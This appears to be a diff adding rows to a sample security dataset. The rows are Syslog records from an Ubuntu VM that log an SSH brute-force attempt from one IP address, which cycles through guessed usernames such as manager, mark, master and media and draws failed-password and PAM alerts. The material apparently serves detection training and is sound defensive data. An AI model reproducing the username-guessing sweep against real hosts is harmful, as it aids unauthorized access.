+2745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:37,UbuntuDevEnv,2019-06-28 05:20:36,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 41090 ssh2,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:37,UbuntuDevEnv,2019-06-28 05:20:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:39,UbuntuDevEnv,2019-06-28 05:20:39,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 41090 ssh2,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:39,UbuntuDevEnv,2019-06-28 05:20:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:41,UbuntuDevEnv,2019-06-28 05:20:41,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 41090 ssh2,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:42,UbuntuDevEnv,2019-06-28 05:20:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:44,UbuntuDevEnv,2019-06-28 05:20:43,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 41090 ssh2,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:44,UbuntuDevEnv,2019-06-28 05:20:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:44,UbuntuDevEnv,2019-06-28 05:20:44,auth,UbuntuDevEnv,info,"Disconnecting invalid user manager 193.201.224.232 port 41090: Change of username or service not allowed: (manager,ssh-connection) -> (Manager,ssh-connection) [preauth]",94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:44,UbuntuDevEnv,2019-06-28 05:20:44,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:48,UbuntuDevEnv,2019-06-28 05:20:48,auth,UbuntuDevEnv,info,Invalid user Manager from 193.201.224.232 port 14599,94431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Manager,193.201.224.2,14599,,
+2756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:48,UbuntuDevEnv,2019-06-28 05:20:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:48,UbuntuDevEnv,2019-06-28 05:20:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:51,UbuntuDevEnv,2019-06-28 05:20:50,auth,UbuntuDevEnv,info,Failed password for invalid user Manager from 193.201.224.232 port 14599 ssh2,94431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Manager,193.201.224.2,14599,,
+2759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:51,UbuntuDevEnv,2019-06-28 05:20:50,auth,UbuntuDevEnv,info,"Disconnecting invalid user Manager 193.201.224.232 port 14599: Change of username or service not allowed: (Manager,ssh-connection) -> (manager,ssh-connection) [preauth]",94431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Manager,193.201.224.2,14599,,
+2760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:53,UbuntuDevEnv,2019-06-28 05:20:52,auth,UbuntuDevEnv,info,Invalid user manager from 193.201.224.232 port 22268,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,22268,,
+2761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:53,UbuntuDevEnv,2019-06-28 05:20:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:53,UbuntuDevEnv,2019-06-28 05:20:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:55,UbuntuDevEnv,2019-06-28 05:20:54,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 22268 ssh2,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,22268,,
+2764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:55,UbuntuDevEnv,2019-06-28 05:20:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:57,UbuntuDevEnv,2019-06-28 05:20:57,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 22268 ssh2,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,22268,,
+2766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:59,UbuntuDevEnv,2019-06-28 05:20:58,auth,UbuntuDevEnv,info,"Disconnecting invalid user manager 193.201.224.232 port 22268: Change of username or service not allowed: (manager,ssh-connection) -> (MANAGER,ssh-connection) [preauth]",94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,22268,,
+2767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:59,UbuntuDevEnv,2019-06-28 05:20:58,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:00,UbuntuDevEnv,2019-06-28 05:20:59,auth,UbuntuDevEnv,info,Invalid user MANAGER from 193.201.224.232 port 55752,94480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MANAGER,193.201.224.2,55752,,
+2769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:00,UbuntuDevEnv,2019-06-28 05:20:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:00,UbuntuDevEnv,2019-06-28 05:20:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:02,UbuntuDevEnv,2019-06-28 05:21:01,auth,UbuntuDevEnv,info,Failed password for invalid user MANAGER from 193.201.224.232 port 55752 ssh2,94480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MANAGER,193.201.224.2,55752,,
+2772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:02,UbuntuDevEnv,2019-06-28 05:21:01,auth,UbuntuDevEnv,info,"Disconnecting invalid user MANAGER 193.201.224.232 port 55752: Change of username or service not allowed: (MANAGER,ssh-connection) -> (manager,ssh-connection) [preauth]",94480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MANAGER,193.201.224.2,55752,,
+2773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:03,UbuntuDevEnv,2019-06-28 05:21:02,auth,UbuntuDevEnv,info,Invalid user manager from 193.201.224.232 port 59496,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,59496,,
+2774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:03,UbuntuDevEnv,2019-06-28 05:21:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:03,UbuntuDevEnv,2019-06-28 05:21:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:04,UbuntuDevEnv,2019-06-28 05:21:04,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 59496 ssh2,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,59496,,
+2777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:05,UbuntuDevEnv,2019-06-28 05:21:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:06,UbuntuDevEnv,2019-06-28 05:21:06,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 59496 ssh2,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,59496,,
+2779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:09,UbuntuDevEnv,2019-06-28 05:21:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:11,UbuntuDevEnv,2019-06-28 05:21:10,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 59496 ssh2,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,59496,,
+2781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:11,UbuntuDevEnv,2019-06-28 05:21:10,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:11,UbuntuDevEnv,2019-06-28 05:21:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user manager 193.201.224.232 port 59496: Change of username or service not allowed: (manager,ssh-connection) -> (mark,ssh-connection) [preauth]",94491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,59496,,
+2783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:15,UbuntuDevEnv,2019-06-28 05:21:14,auth,UbuntuDevEnv,info,Invalid user mark from 193.201.224.232 port 6213,94528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mark,193.201.224.2,6213,,
+2784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:15,UbuntuDevEnv,2019-06-28 05:21:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:15,UbuntuDevEnv,2019-06-28 05:21:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:17,UbuntuDevEnv,2019-06-28 05:21:16,auth,UbuntuDevEnv,info,Failed password for invalid user mark from 193.201.224.232 port 6213 ssh2,94528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mark,193.201.224.2,6213,,
+2787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:17,UbuntuDevEnv,2019-06-28 05:21:16,auth,UbuntuDevEnv,info,"Disconnecting invalid user mark 193.201.224.232 port 6213: Change of username or service not allowed: (mark,ssh-connection) -> (master,ssh-connection) [preauth]",94528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mark,193.201.224.2,6213,,
+2788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:19,UbuntuDevEnv,2019-06-28 05:21:18,auth,UbuntuDevEnv,info,Invalid user master from 193.201.224.232 port 36272,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:19,UbuntuDevEnv,2019-06-28 05:21:19,auth,UbuntuDevEnv,info,Failed none for invalid user master from 193.201.224.232 port 36272 ssh2,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:20,UbuntuDevEnv,2019-06-28 05:21:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:20,UbuntuDevEnv,2019-06-28 05:21:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:21,UbuntuDevEnv,2019-06-28 05:21:21,auth,UbuntuDevEnv,info,Failed password for invalid user master from 193.201.224.232 port 36272 ssh2,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:21,UbuntuDevEnv,2019-06-28 05:21:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:23,UbuntuDevEnv,2019-06-28 05:21:23,auth,UbuntuDevEnv,info,Failed password for invalid user master from 193.201.224.232 port 36272 ssh2,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:24,UbuntuDevEnv,2019-06-28 05:21:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:26,UbuntuDevEnv,2019-06-28 05:21:25,auth,UbuntuDevEnv,info,Failed password for invalid user master from 193.201.224.232 port 36272 ssh2,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:26,UbuntuDevEnv,2019-06-28 05:21:26,auth,UbuntuDevEnv,info,"Disconnecting invalid user master 193.201.224.232 port 36272: Change of username or service not allowed: (master,ssh-connection) -> (media,ssh-connection) [preauth]",94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,193.201.224.2,36272,,
+2798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:26,UbuntuDevEnv,2019-06-28 05:21:26,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:30,UbuntuDevEnv,2019-06-28 05:21:29,auth,UbuntuDevEnv,info,Invalid user media from 193.201.224.232 port 49423,94587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,193.201.224.2,49423,,
+2800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:30,UbuntuDevEnv,2019-06-28 05:21:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:30,UbuntuDevEnv,2019-06-28 05:21:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:32,UbuntuDevEnv,2019-06-28 05:21:32,auth,UbuntuDevEnv,info,Failed password for invalid user media from 193.201.224.232 port 49423 ssh2,94587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,193.201.224.2,49423,,
+2803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:32,UbuntuDevEnv,2019-06-28 05:21:32,auth,UbuntuDevEnv,info,"Disconnecting invalid user media 193.201.224.232 port 49423: Change of username or service not allowed: (media,ssh-connection) -> (mike,ssh-connection) [preauth]",94587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,193.201.224.2,49423,,
